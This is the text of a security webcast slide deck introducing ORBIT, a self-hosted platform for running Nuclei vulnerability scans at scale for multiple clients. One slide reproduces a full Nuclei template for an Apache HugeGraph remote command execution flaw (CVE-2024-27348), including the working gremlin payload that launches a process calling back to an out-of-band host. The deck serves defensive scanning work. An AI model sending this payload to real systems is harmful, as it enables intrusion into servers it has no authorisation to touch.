Introducing
Webcast
scan targets and clients at scale
w/Ralph May
Agenda
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
1
2
3
4
5
5
Introduction
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Black Hills Information Security
What is the antisoc
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
YouR Friendly Neighborhood APT
What if we could red team your company all year. How would that affect your security?
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
YouR Friendly Neighborhood APT
- Initial Access
- Assumed Compromise
- Post Exploitation
- Purple Team
- Scanning
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Scanning
- Vulnerability Scanning
- Data Breach Analysis
- Attack Surface Management (ASM) Light
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Vulnerability Scanning (options)
- Nessus
- Nuclei
-
Qualys
- Many more..
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Vulnerability Scanning (First)
- Enumerate the attack surface
- Domains
- IP
- Services
- Ports
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Vulnerability Scanning (NeedS)
- Constant Scans
- Actionable Data/Findings
- Scalable/Multiple customers
-
History
-
Control
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
build or buy
- Do the current options meet your needs.
- Cost is a factor
- Value for the customer
- Value for the team
- Customization
nuclei
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
if you take nothing from the webcast go run nuclei
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
what is it
- High performance vulnerability scanner
- Simple YAML vulnerability templates
- Supports multiple protocols like TCP, DNS, HTTP, SSL, WHOIS JavaScript
- Ultra-fast parallel scan processing and request clustering.
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
CLI
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.3.8
projectdiscovery.io
[INF] nuclei-templates are not installed, installing...
[INF] Successfully installed nuclei-templates at /Users/ralph/nuclei-templates
[INF] Current nuclei version: v3.3.8 (latest)
[INF] Current nuclei-templates version: v10.1.1 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 154
[INF] Templates loaded for current scan: 7607
[INF] Executing 7425 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 182 unsigned templates for scan. Use with caution.
[INF] No results found. Better luck next time!Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
template
id: CVE-2024-27348
info:
name: Apache HugeGraph-Server - Remote Command Execution
author: DhiyaneshDK
severity: high
description: |
Apache HugeGraph-Server is an open-source graph database that provides a scalable and high-performance solution for managing and analyzing large-scale graph data. It is commonly used in Java8 and Java11 environments. However, versions prior to 1.3.0 are vulnerable to a remote command execution (RCE) vulnerability in the gremlin component.
reference:
- http://www.openwall.com/lists/oss-security/2024/04/22/3
- https://hugegraph.apache.org/docs/config/config-authentication/#configure-user-authentication
- https://lists.apache.org/thread/nx6g6htyhpgtzsocybm242781o8w5kq9
- https://github.com/Zeyad-Azima/CVE-2024-27348
- https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-27348
- https://nvd.nist.gov/vuln/detail/CVE-2024-27348
classification:
cve-id: CVE-2024-27348
cwe-id: CWE-77
epss-score: 0.00045
epss-percentile: 0.15047
metadata:
verified: true
max-request: 1
shodan-query: title:"HugeGraph"
fofa-query: title="HugeGraph"
tags: cve,cve2024,hugegraph,rce,apache
http:
- raw:
- |
POST /gremlin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"SL7\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"ping\", \"{{interactsh-url}}\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
matchers:
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(header, "application/json")'
- 'contains(body, "inputStream\":")'
condition: and
# digest: 4a0a004730450221008578493cfb808436d459d2ccb291e869a96890bc1073b44ba502680294d2a06602200ba6baa9516109d23319e018aee1d92b35ea91dc9b6c1c1c1a8ffe673f471f3f:922c64590222798bb761d5b6d8e72950Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
why did we choose it
- Results (High findings that were exploitable)
- Cost
- Speed
- Customizability
The problem
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
NUCLEI Scanning at scale
- One Consultant == Several Clients
- Control Cost
- Highly Customizable
- Expanded IP Space
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
CI/CD
- Use Ansible / Terraform
- Use with CI/CD to call scans
- Save Output to a S3 Bucket
- Highly Scaliable / One VM per scan
- Integrate with Jira for Deploying and Results
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
CI/CD Problems
- All code no interface
- No history
- State of Saved Findings
- Lacked a database
- No way to search though findings
- Better then manual scans but no data metrics
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Next steps
- Build a web application
- Simple User Interface
- Allow for group think
- Scan at scale with no code experience
- Search though data visually
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
what about project desicovery cloud
- High cost (Pass to Customer)
- Black box (what ip address did we use)
- Customer data
- We tested it. It worked but some times it would just fail.
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
what is it
- Nuclei Scanning at scale
- Self Hosted
- Muti-User
- Muti-Cloud
- Simple Web Interface
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
diagram
S3 Bucket
Scan1
Scan2
SSH/API
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
tech stack
- Golang Pocketbase
- SQL Light DB
- Svelte Frontend
- Ansible
- Terraform
demo
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
May the Demo Gods Bless me
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Release
- Open Source
- Will be on Github Soon
- Cost $ Free
- Active Development
- Using it at ANTISOC
- Beautiful Docs
Conclusion
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Recap
- Scanning at scale is hard
- Nuclei is highly customizable
- Value in building vs buying
- To deliver you have to build tools that allow you to work as one.
questions
Webcast
Introducing ORBIT, Scan Targets and Clients at Scale w/ Ralph May
Orbit
By mwgroup
Orbit
Explore the fascinating world of vulnerability scanning and APTs! Discover innovative solutions like NUCLEI, delve into CI/CD challenges, and see a live demo. Join us for insights that could transform your cybersecurity approach!
